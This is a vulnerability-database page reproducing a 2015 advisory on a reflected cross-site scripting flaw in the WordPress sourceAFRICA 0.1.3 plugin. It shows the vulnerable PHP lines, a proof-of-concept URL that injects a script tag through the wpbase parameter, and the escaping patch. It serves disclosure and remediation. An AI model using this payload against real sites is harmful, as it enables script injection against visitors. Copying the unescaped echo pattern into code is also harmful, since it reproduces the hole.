Lucene search
K

WordPress sourceAFRICA 0.1.3 Cross Site Scripting

🗓️ 29 Aug 2015 00:00:00Reported by Ehsan HosseiniType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

WordPress sourceAFRICA 0.1.3 Cross Site Scripting vulnerability in js/window.ph

Code
`######################  
# Exploit Title : Wordpress sourceAFRICA Plugin Cross Site Scripting  
# Exploit Author : Ashiyane Digital Security Team  
# Vendor Homepage : https://wordpress.org/plugins/sourceafrica/  
# Date: 2015-08-29  
# Tested On : Elementary Os - Firefox  
# Software Link : https://downloads.wordpress.org/plugin/sourceafrica.zip  
# Version : 0.1.3  
######################  
# Vulnerable Code:  
# File: js/window.php - Line 18-19  
  
<script src="<?php echo   
$SITEURL;?>wp-includes/js/tinymce/tiny_mce_popup.js"></script>  
<script src="<?php echo   
$SITEURL;?>wp-includes/js/tinymce/utils/form_utils.js"></script>  
######################  
# POC :  
http://[URL]/[PATH]/wp-content/plugins/sourceafrica/js/window.php?wpbase="></script><script>alert("xss")</script>  
######################  
# Patch:  
# File: js/window.php - Line 18-19  
  
<script src="<?php echo   
htmlspecialchars($SITEURL);?>wp-includes/js/tinymce/tiny_mce_popup.js"></script>  
<script src="<?php echo   
htmlspecialchars($SITEURL);?>wp-includes/js/tinymce/utils/form_utils.js"></script>  
######################  
# Discovered By : Ehsan Hosseini  
######################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation